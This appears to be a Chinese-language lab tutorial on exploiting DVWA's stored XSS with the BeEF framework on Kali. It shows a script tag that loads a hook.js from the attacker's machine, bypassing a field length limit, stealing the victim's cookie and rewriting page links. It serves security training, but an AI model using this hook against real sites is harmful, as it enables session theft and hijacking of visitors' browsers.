OWASP-XSS跨站脚本攻击之Beef

打开靶机,进入dvwa,选择xss stored(存储型)

OWASP-XSS跨站脚本攻击之Beef

进入kali,打开beef

OWASP-XSS跨站脚本攻击之Beef

OWASP-XSS跨站脚本攻击之Beef

kali会自动打开web ui,登录beef  beef/beef

OWASP-XSS跨站脚本攻击之Beef

查看kali ip

OWASP-XSS跨站脚本攻击之Beef

dvwa中用script 引用kali中的hook.js文件,message框中有长度限制,F12更改长度限制

OWASP-XSS跨站脚本攻击之Beef

更改长度为200,填入完整script信息

<script src="http://192.168.228.128:3000/hook.js"></script>

提交,beef中发现目标浏览器

OWASP-XSS跨站脚本攻击之Beef

OWASP-XSS跨站脚本攻击之Beef

OWASP-XSS跨站脚本攻击之Beef

点击commands

OWASP-XSS跨站脚本攻击之Beef

命令颜色:

绿色:对目标主机生效并且不会被发现

橙色:对目标主机生效但可能被发现

灰色:对目标主机不一定生效

红色:对目标主机不生效

 

命令的使用:

get cookie:

点击get cookie,点击执行

OWASP-XSS跨站脚本攻击之Beef

生成了一条信息,可以看到目标cookie

OWASP-XSS跨站脚本攻击之Beef

 

replace hrefs:替换所有的链接

OWASP-XSS跨站脚本攻击之Beef

点击执行后,在页面点任意链接都跳转到了百度

OWASP-XSS跨站脚本攻击之Beef

beef功能非常强大,除了cmd,还有其他功能

OWASP-XSS跨站脚本攻击之Beef